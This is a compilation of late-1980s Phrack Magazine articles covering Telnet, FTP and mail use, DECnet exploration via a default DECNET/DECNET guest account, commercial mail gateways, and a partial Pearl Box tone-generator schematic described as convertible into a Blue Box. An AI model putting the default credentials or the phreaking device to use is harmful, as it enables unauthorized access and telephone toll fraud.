128.115.14.1    LLL-WINKEN.LLNL.GOV         Lawrence Livermore Laboratories     -
128.143.2.7     UVAARPA.VIRGINIA.EDU        University of Virginia              ?
128.148.128.40  BROWNVM.BROWN.EDU           Brown University                    BROWN
128.163.1.5     UKCC.UKY.EDU                University of Kentucky              UKCC
128.183.10.4    NSSDCA.GSFC.NASA.GOV        Goddard Space Flight Center [NASA]  -
128.186.4.18    RAI.CC.FSU.EDU              Florida State University            FSU
128.206.1.1     UMCVMB.MISSOURI.EDU         Univ. of Missouri Columbia          UMCVMB
128.208.1.15    MAX.ACS.WASHINGTON.EDU      University of Washington            MAX
128.228.1.2     CUNYVM.CUNY.EDU             City University of New York         CUNYVM
129.10.1.6      NUHUB.ACS.NORTHEASTERN.EDU  Northeastern University             NUHUB
131.151.1.4     UMRVMA.UMR.EDU              University of Missouri Rolla        UMRVMA
192.9.9.1       SUN.COM                     Sun Microsystems, Inc.              -
192.33.18.30    VM1.NODAK.EDU               North Dakota State Univ.            NDSUVM1
192.33.18.50    PLAINS.NODAK.EDU            North Dakota State Univ.            NDSUVAX
Please Note: Not every system on BITnet has an IP address. Likewise, not every
system that has an IP address is on BITnet. Also, while some locations like
Stanford University may have nodes on
BITnet and have hosts on the IP as well, this does not necessarily imply that
the systems on BITnet and on IP (the EDU domain in this case) are the same
systems.
Attempts to gain unauthorized access to systems on the Internet are not
tolerated and are legally a federal offense. At some hosts, they take this very
seriously, especially the government hosts such as
NASA's Goddard Space Flight Center, where they do not mind telling you so at the
main prompt when you connect to their system.
However, some nodes are public access to an extent. The DDN Network Information
Center can be used by anyone. The server and database there have proven to be an
invaluable source of
information when locating people, systems, and other information that is related
to the Internet.
Telnet
Remote login refers to logging in to a remote computer from a terminal connected
to a local computer. Telnet is the standard protocol in the DOD Protocol Suite
for accomplishing this. The "rlogin"
program, provided with Berkeley UNIX systems and some other systems, also
enables remote login.
For purposes of discussion, the "local computer" is the computer to which your
terminal is directly connected while the "remote computer" is the computer on
the network to which you are
communicating and to which your terminal is *NOT* directly connected.
Since some computers use a different method of attaching terminals to computers,
a better definition would be the following: The "local computer" is the computer
that you are currently using and the
"remote computer" is the computer on the network with which you are or will be
communicating. Note that the terms "host" and "computer" are synonymous in the
following discussion.
To use Telnet, simply enter the command: TELNET
The prompt that Telnet gives is: Telnet>
(However, you can specify where you want to Telnet to immediately and bypass the
prompts and other delays by issuing the command: TELNET [location].)
There is help available by typing in ?. This prints a list of all the valid
subcommands that Telnet provides with a one-line explanation.
Telnet> ?
To connect to another computer, use the open subcommand to open a connection
to that computer. For example, to connect to the host "UMCVMB.MISSOURI.EDU",
do "open umcvmb.missouri.edu"
Telnet will resolve (i.e. translate) the hostname "umcvmb.missouri.edu" into an
IP address and will send a packet to that host requesting login. If the remote
host decides to let you attempt a login, it prompts you for your username and
password. If the host does not respond, Telnet will "time out" (i.e. wait for a
reasonable amount of time such as 20 seconds) and then terminate with a message
such as "Host not responding."
If your computer does not have an entry for a remote host in its hosttable and
it cannot resolve the name, you can use the IP address explicitly in the telnet
command. For example,
TELNET 26.0.0.73 (Note: This is the IP address for the DDN Network Information
Center [SRI-NIC.ARPA])
If you are successful in logging in, your terminal is connected to the remote
host. For all intents and purposes, your terminal is directly hard-wired to that
host and you should be able to do anything on
your remote terminal that you can do at any local terminal. There are a few
exceptions to this rule, however.
Telnet provides a network escape character, such as CONTROL-T. You can find out
what the escape character is by entering the "status" subcommand:
Telnet> status
You can change the escape character by entering the "escape" subcommand:
Telnet> escape
When you type in the escape character, the Telnet prompt returns to your screen
and you can enter subcommands. For example, to break the connection, which
usually logs you off the remote host,
enter the subcommand "quit":
Telnet> quit
Your Telnet connection usually breaks when you log off the remote host, so the
"quit" subcommand is not usually used to log off.
When you are logged in to a remote computer via Telnet, remember that there is a
time delay between your local computer and the remote one. This often becomes
apparent to users when scrolling a
long file across the terminal screen and they wish to cancel the scrolling by
typing CONTROL-C or something similar. After typing the special control
character, the scrolling continues. The special
control character takes a certain amount of time to reach the remote computer
which is still scrolling information. Thus response from the remote computer
will not likely be as quick as response from a
local computer. Once you are remotely logged on, the computer you are logged on
to effectively becomes your "local computer," even though your original "local
computer" still considers you logged
on. You can log on to a third computer which would then become your "local
computer" and so on. As you log out of each session, your previous session
becomes active again.
File Transfer
FTP is the program that allows files to be sent from one computer to another.
"FTP" stands for "File Transfer Protocol".
When you start using FTP, a communications channel with another computer on the
network is opened. For example, to start using FTP and initiate a file transfer
session with a computer on the
network called "UMCVMB", you would issue the following subcommand:
FTP UMCVMB.MISSOURI.EDU
Host "UMCVMB" will prompt you for an account name and password. If your login is
correct, FTP will tell you so, otherwise it will say "login incorrect." Try
again or abort the FTP program. (This is
usually done by typing a special control character such as CONTROL-C. The
"program abort" character varies from system to system.)
Next you will see the FTP prompt, which is:
Ftp>
There are a number of subcommands of FTP. The subcommand "?" will list these
commands and a brief description of each one.
You can initiate a file transfer in either direction with FTP, either from the
remote host or to the remote host. The "get" subcommand initiates a file
transfer from the remote host (i.e. tells the remote
computer to send the file to the local computer [the one on which you issued the
"ftp" command]). Simply enter "get" and FTP will prompt you for the remote
host's file name and the (new) local host's
file name. Example:
Ftp> get
Remote file name?
theirfile
local file name?
myfile
You can abbreviate this by typing both file names on the same line as the "get"
subcommand. If you do not specify a local file name, the new local file will be
called the same thing as the remote file.
Valid FTP subcommands to get a file include the following:
get theirfile myfile
get doc.x25
The "put" subcommand works in a similar fashion and is used to send a file from
the local computer to the remote computer. Enter the command "put" and FTP will
prompt you for the local file name
and then the remote file name. If the transfer cannot be done because the file
doesn't exist or for some other reason, FTP will print an error message.
There are a number of other subcommands in FTP that allow you to do many more
things. Not all of these are standard so consult your local documentation or
type a question mark at the FTP prompt.
Some functions often built into FTP include the ability to look at files before
getting or putting them, the ability to change directories, the ability to
delete files on the remote computer, and the ability to
list the directory on the remote host.
An intriguing capability of many FTP implementations is "third party transfers."
For example, if you are logged on computer A and you want to cause computer B to
send a file to computer C, you can
use FTP to connect to computer B and use the "rmtsend" command. Of course, you
have to know usernames and passwords on all three computers, since FTP never
allows you to peek into
someone's directory and files unless you know their username and password.
The "cd" subcommand changes your working directory on the remote host. The "lcd"
subcommand changes the directory on the local host. For UNIX systems, the
meaning of these subcommands is
obvious. Other systems, especially those that do not have a directory-structured
file system, may not implement these commands or may implement them in a
different manner.
The "dir" and "ls" subcommands do the same thing, namely list the files in the
working directory of the remote host.
The "list" subcommand shows the contents of a file without actually putting it
into a file on the local computer. This would be helpful if you just wanted to
inspect a file. You could interrupt it before it
reached the end of the file by typing CONTROL-C or some other special character.
This is dependent on your FTP implementation.
The "delete" command can delete files on the remote host. You can also make and
remove directories on the remote host with "mkdir" and "rmdir". The "status"
subcommand will tell you if you are
connected and with whom and what the state of all your options is.
If you are transferring binary files or files with any non-printable characters,
turn binary mode on by entering the "binary" subcommand:
binary
To resume non-binary transfers, enter the "ascii" subcommand.
Transferring a number of files can be done easily by using "mput" (multiple put)
and "mget" (multiple get). For example, to get every file in a particular
directory, first issue a "cd" command to change to
that directory and then a "mget" command with an asterisk to indicate every
file:
cd somedirectory
mget *
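The opening of this file notes that the user-level subcommands sit on top of a standard set of protocol commands. This added example (not part of the original file) translates the subcommands of this section, including "close" and "bye" covered just below, into the RFC 959 commands a server would receive and log. Login (USER/PASS) and data-connection setup are left out, "dir" and "ls" are both mapped to LIST as an assumption since clients differ, and the non-standard "list" and "rmtsend" have no mapping.

```python
import fnmatch

ONE_ARG = {"cd": "CWD", "delete": "DELE", "mkdir": "MKD", "rmdir": "RMD"}
NO_ARG = {"dir": "LIST", "ls": "LIST", "binary": "TYPE I", "ascii": "TYPE A"}
LOCAL_ONLY = {"lcd", "status", "?"}      # handled by the client, never sent
HANG_UP = {"close", "bye", "quit"}
CHANGES_SERVER = ("STOR", "DELE", "MKD", "RMD")


def wire_commands(session, remote_names=()):
    """Translate typed ftp subcommands into protocol commands.

    remote_names stands in for the name list the server would return to
    NLST, so that "mget" can be expanded offline.
    """
    sent, connected = [], True
    for line in session:
        words = line.split()
        if not words:
            continue
        cmd, args = words[0].lower(), words[1:]
        if cmd in LOCAL_ONLY:
            continue
        if cmd in HANG_UP:
            if connected:                # "bye" after "close" sends nothing
                sent.append("QUIT")
                connected = False
            continue
        if not connected:
            raise ValueError(f"{cmd!r} issued after the connection was closed")
        if cmd in NO_ARG:
            sent.append(NO_ARG[cmd])
        elif cmd in ONE_ARG and len(args) == 1:
            sent.append(f"{ONE_ARG[cmd]} {args[0]}")
        elif cmd == "get" and len(args) in (1, 2):
            # get remote [local]: only the remote name crosses the network
            sent.append(f"RETR {args[0]}")
        elif cmd == "put" and len(args) in (1, 2):
            # put local [remote]: the remote name defaults to the local one
            sent.append(f"STOR {args[-1]}")
        elif cmd == "mget" and len(args) == 1:
            sent.append(f"NLST {args[0]}")
            sent.extend(f"RETR {name}" for name in remote_names
                        if fnmatch.fnmatchcase(name, args[0]))
        else:
            raise ValueError(f"no standard mapping for {line!r}")
    return sent


def server_changes(sent):
    """Commands in a session that modify the remote host (worth auditing)."""
    return [c for c in sent if c.split()[0] in CHANGES_SERVER]


if __name__ == "__main__":
    typed = ["binary", "cd somedirectory", "lcd /tmp", "mget *",
             "get theirfile myfile", "put myfile", "delete doc.x25",
             "close", "bye"]
    for command in wire_commands(typed, ["doc.x25", "theirfile"]):
        print(command)
```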
When you are done, use the "close" subcommand to break the communications link.
You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
return to the command level. The
"quit" subcommand will close the connection and exit from FTP at the same time.
Mail
Mail is the simplest network facility to use in many ways. All you have to do is
to create your message, which can be done with a file editor or on the spur of
the moment, and then send it. Unlike FTP
and Telnet, you do not need to know the password of the username on the remote
computer. This is so because you cannot change or access the files of the remote
user nor can you use their account
to run programs. All you can do is to send a message.
There is probably a program on your local computer which does mail between users
on that computer. Such a program is called a mailer. This may or may not be the
way to send or receive mail from
other computers on the network, although integrated mailers are more and more
common. UNIX mailers will be used as an example in this discussion.
Note that the protocol which is used to send and receive mail over a TCP/IP
network is called SMTP, the "Simple Mail Transfer Protocol." Typically, you will
not use any program called SMTP, but
rather your local mail program.
UNIX mailers are usually used by invoking a program named "mail". To receive new
mail, simply type "mail". There are several varieties of UNIX mailers in
existence. Consult your local documentation
for details. For example, the command "man mail" prints out the manual pages for
the mail program on your computer.
To send mail, you usually specify the address of the recipient on the mail
command. For example: "mail knight@umcvmb.missouri.edu" will send the following
message to username "knight" on host
"umcvmb".
You can usually type in your message one line at a time, pressing RETURN after
each line and typing CONTROL-D to end the message. Other facilities to include
already-existing files sometimes exist.
For example, Berkeley UNIX systems allow you to enter commands similar to the
following to include a file in your current mail message:
~r myfile
In this example, the contents of "myfile" are inserted into the message at this
point.
Most UNIX systems allow you to send a file through the mail by using input
redirection. For example:
mail knight@umcvmb.missouri.edu < myfile
In this example, the contents of "myfile" are sent as a message to "knight" on
"umcvmb."
Note that in many UNIX systems the only distinction between mail bound for
another user on the same computer and another user on a remote computer is
simply the address specified. That is, there is
no hostname for local recipients. Otherwise, mail functions in exactly the same
way. This is common for integrated mail packages. The system knows whether to
send the mail locally or through the
network based on the address and the user is shielded from any other details.
"The Quest For Knowledge Is Without End..."
123. Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning
Prologue For Non-VMS Users
DECnet is the network for DEC machines, in most cases you can say VAX's. DECnet
allows you to do:
· e-mail
· file transfer
· remote login
· remote command
· remote job entry
· PHONE
PHONE is an interactive communication between users and is equal to TALK on UNIX
or a "deluxe"-CHAT on VM/CMS.
BELWUE, the university network of the state Baden-Wuerttemberg in West Germany
contains (besides other networks) a DECnet with about 400 VAX's. On every VAX
there is a standard-account
called DECNET with pw:= DECNET, which is not reachable via remote login. This
account is provided for several DECnet-Utilities and as a pseudo-guest-account.
The DECNET-account has very
restricted privileges: You cannot edit a file or make another remote login.
The HELP is equipped by the system and is similar to the MAN command on UNIX.
More information on DECnet can be found in "Looking Around In DECnet" by Deep
Thought in this very issue of Phrack Inc.
Here, at the University of Ulm, we have an *incredibly* ignorant computer center
staff, with an even bigger lack of system-literature (besides the 80kg of
VAX/VMS-manuals). The active may search
for information by himself, which is over the level of "run," "FORTRAN," or
"logout." My good luck that I have other accounts in the BELWUE-DECnet, where
more information is offered for the
users. I am a regular student in Ulm and all my accounts are completely legal
and corresponding to the German laws. I don't call myself a "hacker," I feel
more like a "user" (...it's more a
defining-problem).
In the HELP-menu in a host in Tuebingen I found the file netdcl.com and the
corresponding explanation, which sends commands to the DECNET-Account of other
VAX's and executes them there
(remote command). The explanation in the HELP-menu was idiot-proof -- therefore
for me, too :-)
With the command "$ mcr ncp show known nodes" you can obtain a list of all
netwide active VAX's, as is generally known, and so I pinged all these VAX's to
look for more information for a
knowledge-thirsty user. With "help", "dir" and other similar commands I look
around on those DECnet accounts, always watching for topics related to the
BELWUE-network. It's a pity, that 2/3 of all
VAX's have locked the DECNET-Account for NETDCL.COM. Their system managers are
probably afraid of unauthorized access, but I cannot imagine how there could be
such an unauthorized
access, because you cannot log on this account -- no chance for trojan horses,
etc.
Some system managers called me back after I visited their VAX to chat with me
about the network and asked me if they could help me in any way. One sysop from
Stuttgart even sent me a version of
NETDCL.COM for the ULTRIX operation system.
Then, after a month, the HORROR came over me in the shape of the following mail:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38
To: FRAMSTAG
CC:
Subj: don't make any crap, or you'll be kicked out!
From: ITTGPX::SYSTEM 29-MAY-1989 16:46
To: TUEBINGEN::SYSTEM
Subj: System-breaking-in 01-May-1989
To the system manager of the Computer TUEBINGEN,
On May 1st 1989 we had a System-breaking-in in our DECNET-account, which started
from your machine. By help of our accounting we ascertained your user FRAMSTAG
to have emulated an
interactive log-on on our backbone-node and on every machine of our VAX-cluster
with the "trojan horse" NETDCL.COM. Give us this user's name and address and
clear up the occurrence
completely. We point out that the user is punishable. In case of repetition we
would be forced to take corresponding measures. We will check whether our system
got injured. If not, this time we will
disregard any measure. Inform us via DECnet about your investigation results --
we are attainable by the nodenumber 1084::system
Dipl.-Ing. Michael Hager
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
My system manager threatened me with the deleting of my account, if I would not
immediately enlighten the affair. *Gulp*! I was conscious about my innocence,
but how to tell it to the others? I
explained, step by step, everything to my system manager. He then understood
after a while, but the criminal procedure still hovered over me... so, I took
quickly to my keyboard, to compose a file of
explanations and to send it to that angry system manager in Stuttgart (node 1084
is an institute there). But no way out: He had run out of disk quota and my
explanation-mail sailed into the nirvana:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
$ mail explanation
To: 1084::system
%MAIL-E, error sending to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening
SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
as output
-RMS-E-CRE, ACP file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
Also the attempt of a connection with the PHONE-facility failed: In his
borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
the REAL-addresses of the virtual
DECnet-addresses available (to prevent hacking). Now I stood there with the
brand "DANGEROUS HACKER!" and I had no chance to vindicate myself. I poured out
my troubles to an
acquaintance of mine, who is a sysop in the computer-center in Freiburg. He
asked other sysops and managers thru the whole BELWUE-network until someone gave
him a telephone number after a
few days -- and that was the right one!
I phoned to this Hager and told him what I had done with his DECnet-account and
also what NOT. I wanted to know which crime I had committed. He promptly
canceled all of his reproaches, but
he did not excuse his defaming incriminations. I entreated him to inform my
system manager in Tuebingen that I have done nothing illegal and to stop him
from erasing my account. This happens already
to a fellow student of mine (in this case, Hager was also guilty). He promised
me that he would officially cancel his reproaches.
After over a week this doesn't happen (I'm allowed to use my account further
on). In return for it, I received a new mail from Hager on another account of
mine:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: 1084::HAGER 1-JUN-1989 12:51
To: 50180::STUD_11
Subj: System-breaking-in
On June 1st 1989 you have committed a system-breaking-in on at least one of our
VAX's. We were able to register this occurrence. We would be forced to take
further measure if you did not clear
up the occurrence completely until June 6th.
Of course the expenses involved would be imposed on you. Hence enlightenment
must be in your own interest.
We are attainable via DECnet-mail with the address 1084::HAGER or via following
address:
Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80
M. Hager
M. Mrzyglod
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
This was the reaction of my attempt: "$ PHONE 1084::SYSTEM". I have not answered
to this mail. I AM SICK OF IT!
124. Phrack Magazine - Vol. 3, Issue 28 by Taran King
ACSNET
Australian Computer Science Network (ACSNET), also known as Oz, has its gateway
through the CSNET node munnari.oz.au and if you cannot directly mail to the
oz.au domain, try either
username%munnari.oz.au@UUNET.UU.NET or munnari!username@UUNET.UU.NET.
AT&T MAIL
AT&T Mail is a mailing service of AT&T, probably what you might call its
MCI-Mail equivalent. It is available on the UUCP network as node name attmail
but I've had problems having mail get
through. Apparently, it does cost money to mail to this service and the
surrounding nodes are not willing to pick up the tab for the ingoing mail, or at
least, this has seemingly been the case thus far. I
believe, though, that perhaps routing to att!attmail!user would work.
AT&T recently announced six new X.400 interconnections between AT&T Mail and
electronic mail services in the US, Korea, Sweden, Australia, and Finland. In
the US, AT&T Mail is now
interconnected with Telenet Communications Corporation's service, Telemail,
allowing users of both services to exchange messages easily. With the addition
of these interconnections, the AT&T Mail
Gateway 400 Service allows AT&T Mail subscribers to exchange messages with users
of the following electronic messaging systems:
Company                 E-Mail Name   Country
TeleDelta               TeDe 400      Sweden
OTC                     MPS400        Australia
Telecom-Canada          Envoy100      Canada
DACOM                   DACOM MHS     Korea
P&T-Tele                MailNet 400   Finland
Helsinki Telephone Co.  ELISA         Finland
Dialcom                 Dialcom       USA
Telenet                 Telemail      USA
KDD                     Messavia      Japan
Transpac                ATLAS400      France
The interconnections are based on the X.400 standard, a set of guidelines for
the format, delivery and receipt of electronic messages recommended by an
international standards committee, the CCITT.
International X.400 messages incur a surcharge. They are:
To Canada:
Per note: $.05
Per message unit: $.10
To other international locations:
Per note: $.20
Per message unit: $.50
There is no surcharge for X.400 messages within the US. The following are
contacts to speak with about mailing through these mentioned networks. Other
questions can be directed through AT&T
Mail's toll-free number, 1-800-624-5672.
MHS Gateway: mhs!atlas
Administrator: Bernard Tardieu
Transpac
Phone: 3399283203

MHS Gateway: mhs!dacom
Administrator: Bob Nicholson
AT&T
Morristown, NJ 07960
Phone: +1 201 644 1838

MHS Gateway: mhs!dialcom
Administrator: Mr. Laraman
Dialcom
South Plainfield, NJ 07080
Phone: +1 441 493 3843

MHS Gateway: mhs!elisa
Administrator: Ulla Karajalainen
Nokia Data
Phone: 01135804371

MHS Gateway: mhs!envoy
Administrator: Kin C. Ma
Telecom Canada
Phone: +1 613 567 7584

MHS Gateway: mhs!kdd
Administrator: Shigeo Lwase
Kokusai Denshin Denwa CO.
Phone: 8133477419

MHS Gateway: mhs!mailnet
Administrator: Kari Aakala
Gen Directorate Of Post &
Phone: 35806921730

MHS Gateway: mhs!otc
Administrator: Gary W. Krumbine
AT&T Information Systems
Lincroft, NJ 07738
Phone: +1 201 576 2658

MHS Gateway: mhs!telemail
Administrator: Jim Kelsay
GTE Telenet Comm Corp
Reston, VA 22096
Phone: +1 703 689 6034

MHS Gateway: mhs
Administrator: AT&T Mail MHS Gateway
AT&T
Lincroft, NJ 08838
Phone: +1 800 624 5672
CMR
Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a mail
relay service between the Internet and three commercial electronic mail systems:
US Sprint/Telenet, MCI-Mail, and
DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
An important note: The only requirement for using this mail gateway is that the
work conducted must be DARPA sponsored research and other approved government
business. Basically, this means
that unless you've got some government-related business, you're not supposed to
be using this gateway. Regardless, it would be very difficult for them to screen
everything that goes through their
gateway. Before I understood the requirements of this gateway, I was sending to
a user of MCI-Mail and was not contacted about any problems with that
communication. Unfortunately, I mistyped
the MCI-Mail address on one of the letters and that letter ended up getting read
by system administrators who then informed me that I was not to be using that
system, as well as the fact that they
would like to bill me for using it. That was an interesting thought on their
part anyway, but do note that using this service does incur charges.
The CMR mailbox address in each system corresponds to the label:
Telemail: [Intermail/USCISI]TELEMAIL/USA
MCI-Mail: Intermail or 107-8239
CompMail: Intermail or CMP0817
NSF-Mail: Intermail or NSF153
USDA-Mail: Intermail or AGS9999
Addressing examples for each e-mail system are as follows:
MCIMAIL:
  123-4567                    seven digit address
  Everett T. Bowens           person's name (must be unique!)
COMPMAIL:
  CMP0123                     three letters followed by three or four digits
  S.Cooper                    initial, then "." and then last name
  134:CMP0123                 domain, then ":" and then combination system and account number
NSFMAIL:
  NSF0123                     three letters followed by three or four digits
  A.Phillips                  initial, then "." and then last name
  157:NSF0123                 domain, then ":" and then combination system and account number
USDAMAIL:
  AGS0123                     three letters followed by three or four digits
  P.Shifter                   initial, then "." and then last name
  157:AGS0123                 domain, then ":" and then combination system and account number
TELEMAIL:
  BARNOC                      user (directly on Telemail)
  BARNOC/LODH                 user/organization (directly on Telemail)
  [BARNOC/LODH]TELEMAIL/USA   [user/organization]system branch/country
The following are other Telenet system branches/countries that can be mailed to:
TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIA
TELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALY
ATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USA
GSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USA
USDA/USA
Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to it,
the format would be [A.MAILBOX/OMNET]MAIL/USA. The following are available
subdivisions of OMNET:
AIR Atmospheric Sciences
EARTH Solid Earth Sciences
LIFE Life Sciences
OCEAN Ocean Sciences
POLAR Interdisciplinary Polar Studies
SPACE Space Science and Remote Sensing
The following is a list of DIALCOM systems available in the listed countries
with their domain and system numbers:
Service Name     Country         Domain Number  System Number
Keylink-Dialcom  Australia       60             07, 08, 09
Dialcom          Canada          20             20, 21, 22, 23, 24
DPT Databooks    Denmark         124            71
Telebox          Finland         127            62
Telebox          West Germany    30             15, 16
Dialcom          Hong Kong       80             88, 89
Eirmail          Ireland         100            74
Goldnet          Israel          50             05, 06
Mastermail       Italy           130            65, 67
Mastermail       Italy           1              66, 68
Dialcom          Japan           70             13, 14
Dialcom          Korea           1              52
Telecom Gold     Malta           100            75
Dialcom          Mexico          1              52
Memocom          Netherlands     124            27, 28, 29
Memocom          Netherlands     1              55
Starnet          New Zealand     64             01, 02
Dialcom          Puerto Rico     58             25
Telebox          Singapore       88             10, 11, 12
Dialcom          Taiwan          1              52
Telecom Gold     United Kingdom  100            01, 04, 17, 80-89
DIALCOM          USA             1              29-34, 37, 38, 41-59, 61-63, 90-99
NOTE:
You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV
instead of going through the CMR gateway to mail to NASAMAIL or GSFCMAIL.
For more information and instructions on how to use CMR, send a message to the
user support group at intermail-request@intermail.isi.edu (you'll get basically
what I've listed plus maybe a bit more).
Please read Chapter 3 of The Future Transcendent Saga (Limbo to Infinity) for
specifics on mailing to these destination mailing systems.
COMPUSERVE
CompuServe is well known for its games and conferences. It does, though, have
mailing capability. Now, they have developed their own Internet domain, called
COMPUSERVE.COM. It is relatively
new and mail can be routed through either TUT.CIS.OHIO-STATE.EDU or
NORTHWESTERN.ARPA.
(Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU, or replace
TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA.)
The CompuServe link appears to be a polled UUCP connection at the gateway
machine. It is actually managed via a set of shell scripts and a comm utility
called xcomm, which operates via command
scripts built on the fly by the shell scripts during analysis of what jobs exist
to go into and out of CompuServe.
CompuServe subscriber accounts of the form 7xxxx, yyyy can be addressed as
7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by their
usernames in the
csi.compuserve.com subdomain. CIS subscribers write mail to
">inet:user@host.domain" to mail to users on the Wide-Area Networks, where
">gateway:" is CompuServe's internal gateway access
syntax. The gateway generates fully-RFC-compliant headers.
To fully extrapolate -- from the CompuServe side, you would use their EasyPlex
mail system to send mail to someone in BITNET or the Internet. For example, to
send me mail at my Bitnet ID, you
would address it to:
INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
Or to my Internet ID:
INET:C488869@UMCVMB.MISSOURI.EDU
Now, if you have a BITNET to Internet userid, this is a silly thing to do, since
your connect time to CompuServe costs you money. However, you can use this
information to let people on CompuServe
contact YOU. CompuServe Customer Service says that there is no charge to either
receive or send a message to the Internet or BITNET.
DASNET
DASnet is a smaller network that connects to the Wide-Area Networks but charges
for their service. DASnet subscribers get charged for both mail to users on
other networks AND mail for them from
users of other networks. The following is a brief description of DASnet, some of
which was taken from their promotional text letter.
DASnet allows you to exchange electronic mail with people on more than 20
systems and networks that are interconnected with DASnet. One of the drawbacks,
though, is that, after being subscribed
to these services, you must then subscribe to DASnet, which is a separate cost.
Members of Wide-Area networks can subscribe to DASnet too. Some of the networks
and systems reachable through
DASnet include the following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom,
EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet,
Portal
Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan),
Telex, TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and
".EDU" etc.). New
systems are added all of the time. As of the writing of this file, Connect,
GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be
connected.
You can get various accounts on DASnet including:
· Corporate Accounts -- If your organization wants more than one individual
subscription.
· Site Subscriptions -- If you want DASnet to link directly to your
organization's electronic mail system.
To send e-mail through DASnet, you send the message to the DASnet account on
your home system. You receive e-mail at your mailbox, as you do now. On the
Wide-Area Networks, you send mail
to XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in
brackets and then the username just outside of them. The real subject can be
expressed after the username
separated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?).
The only disadvantage of using DASnet as opposed to Wide-Area networks is the
cost. Subscription costs as of 3/3/89 are $4.75 per month, or $5.75 per month
for hosts that are outside of the USA.
You are also charged for each message that you send. If you are corresponding
with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your
account.
The following is an abbreviated cost list for mailing to the different services
of DASnet:
| PARTIAL List of Services Linked by DASnet (e-mail) | DASnet Cost, 1st 1000 Characters | DASnet Cost, Each Additional 1000 Characters |
| INET, MacNET, PeaceNet, Unison, UUCP*, Domains, e.g. .COM, .EDU* | .21 | .11 |
| Dialcom--Any "host" in US | .36 | .25 |
| Dialcom--Hosts outside US | .93 | .83 |
| EasyLink (From EasyLink) | .21 | .11 |
| EasyLink (To EasyLink) | ½5 | .23 |
| US FAX (international avail.) | .79 | .37 |
| GeoMail--Any "host" in US | .21 | .11 |
| GeoMail--Hosts outside US | .74 | .63 |
| MCI (from MCI) | .21 | .11 |
| MCI (to MCI) | .78 | .25 |
| MCI (Paper mail - USA) | 2.31 | .21 |
| Telemail | .36 | .25 |
| W.U. Telex--United States | 1.79 | 1.63 |
| TWICS--Japan | .89 | .47 |
NOTE: 20 lines of text is app. 1000 characters.
(You can also send Telexes outside the US)
* The charges given here are to the gateway to the network. The DASnet user is
not charged for transmission on the network itself.
Subscribers to DASnet get a free DASnet Network Directory as well as a listing
in the directory, and the ability to order optional DASnet services like
auto-porting or DASnet Telex Service which
gives you your own Telex number and answerback for $8.40 a month at this time.
DASnet is a registered trademark of DA Systems, Inc.
DA Systems, Inc.
1503 E. Campbell Ave.
Campbell, CA 95008
408-559-7434
TELEX: 910 380-3530
The following two sections on PeaceNet and AppleLink are in association with
DASnet as this network is what is used to connect.
125. Phrack Magazine - Vol. 3, Issue 28 by Dispater
Introduction:
After reading the earlier renditions of schematics for the Pearl Box, I decided
that there was an easier and cheaper way of doing the same thing with an IC and
parts you probably have just lying
around the house.
What Is A Pearl Box and Why Do I Want One?
A Pearl Box is a tone generating device that is used to make a wide range of
single tones. Therefore, it would be very easy to modify this basic design to
make a Blue Box by making 2 Pearl Boxes and
joining them together in some fashion.
A Pearl Box can be used to create any tone you wish that other boxes may not. It
also has a tone sweep option that can be used for numerous things like detecting
different types of phone tapping
devices.
Parts List:
· CD4049 RCA integrated circuit
· .1 uF disk capacitor
· 1 uF 16V electrolytic capacitor
· 1K resistor
· 10M resistor
· 1Meg pot
· 1N914 diode
· Some SPST momentary push-button switches
· 1 SPDT toggle switch
· 9 Volt battery & clip and miscellaneous stuff you should have lying around
the house.
State-of-the-Art-Text Schematic:
+ 16V 1uF -
_______________________________||_____
| ! ! || | _
| _______________________ |__________| |/| 8ohms
____|__|_____:__|__:__|_ | __________| | |
| 9 10 11 12 13 14 15 16 | | | |_|\|
| CD4049UBE | | |
|_1__2__3__4__5__6__7__8_| : | _
| | |__| |__| | |____________________|_________[-]
| | ! ! : [b]
| |__________________________| [a]
| : : | [t]
| ! 1N914 ! ! [t]
|___________|/|_____________________________________[+]
: |\| : :
| | |
| 10M | |
|___/\/\/\__| |
| | |
|_____||____| | <-- These 2 wires to the center pole
|| | | of switch.
.1uF 50V | |
| |
_______________________| |_____________________________
| ___[Toggle Switch]____________ |
| | | ___ |
| | | o o |
